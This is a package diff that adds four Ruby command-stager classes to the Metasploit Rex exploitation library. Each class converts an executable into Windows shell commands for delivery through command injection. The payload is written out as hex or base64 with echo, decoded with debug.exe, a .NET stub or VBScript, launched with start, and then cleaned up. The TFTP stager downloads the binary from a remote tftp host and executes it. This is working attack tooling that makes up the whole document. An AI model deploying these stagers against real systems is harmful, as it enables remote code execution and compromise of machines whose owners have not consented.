librex 0.0.20 → 0.0.21

data/lib/rex/exploitation/cmdstager/debug_asm.rb

@@ -0,0 +1,142 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_decoder_asm  = Rex::Text.rand_text_alpha(8) + ".dat"
+		@var_decoder_com  = Rex::Text.rand_text_alpha(8) + ".com"
+		@var_payload_in   = Rex::Text.rand_text_alpha(8) + ".dat"
+		@var_payload_out  = Rex::Text.rand_text_alpha(8) + ".exe"
+		@decoder          = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_payload_in}"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple hex encoding...
+	#
+	def encode_payload(opts)
+		ret = @exe.unpack('H*')[0]
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+		decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+		# NOTE: these two filenames MUST 8+3 chars long.
+		decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+		decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Convert the debug script to an executable...
+		cvt_cmd = ''
+		if (@tempdir != '')
+			cvt_cmd << "cd %TEMP% && "
+		end
+		cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+		cmds << cvt_cmd
+
+		# Convert the encoded payload...
+		cmds << "#{@tempdir}#{@var_decoder_com}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir}#{@var_payload_out}"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_decoder_asm}"
+			cmds << "del #{@tempdir}#{@var_decoder_com}"
+			cmds << "del #{@tempdir}#{@var_payload_in}"
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/debug_write.rb

@@ -0,0 +1,136 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_bypass  = Rex::Text.rand_text_alpha(8)
+		@var_payload = Rex::Text.rand_text_alpha(8)
+		@decoder     = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_payload}"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple hex encoding...
+	#
+	def encode_payload(opts)
+		@exe.unpack('H*')[0]
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Convert the debug script to an executable...
+		cvt_cmd = ''
+		if (@tempdir != '')
+			cvt_cmd << "cd %TEMP% && "
+		end
+		cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+		cmds << cvt_cmd
+
+		# Rename the resulting binary
+		cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+		# Converting the encoded payload...
+		cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_bypass}.exe"
+			cmds << "del #{@tempdir}#{@var_payload}"
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/tftp.rb

@@ -0,0 +1,63 @@
+##
+# $Id: tftp.rb 10169 2010-08-27 17:23:47Z jduck $
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses tftp.exe to download a binary from the specified
+# server.  The original file is preserve, not encoded at all, and so this version
+# is significantly simpler than other methods.
+#
+# Requires: tftp.exe, outbound udp connectivity to a tftp server
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerTFTP < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Initiate the download
+		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir + @payload_exe}"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# NOTE: We don't use a concatenation operator here since we only have a couple commands.
+	# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
+	# the start command being issued separately so that it can ignore it :)
+
+	attr_reader :payload_exe
+end
+end
+end

data/lib/rex/exploitation/cmdstager/vbs.rb

@@ -0,0 +1,128 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses Windows Scripting (VBS) to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+# Requires: Windows Scripting
+# Known Issue: errors with non-ascii-native systems
+#
+# Written by bannedit
+#
+###
+
+class CmdStagerVBS < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_decoder = Rex::Text.rand_text_alpha(5)
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+		@decoder     = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decode_stub/, "#{@tempdir}#{@var_decoder}.vbs")
+		decoder.gsub!(/ENCODED/, "#{@tempdir}#{@var_encoded}.b64")
+		decoder.gsub!(/DECODED/, "#{@tempdir}#{@var_decoded}.exe")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "cscript //nologo #{@tempdir}#{@var_decoder}.vbs"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_decoder}.vbs"
+			cmds << "del #{@tempdir}#{@var_encoded}.b64"
+			# NOTE: We won't be able to delete the exe while it's in use.
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end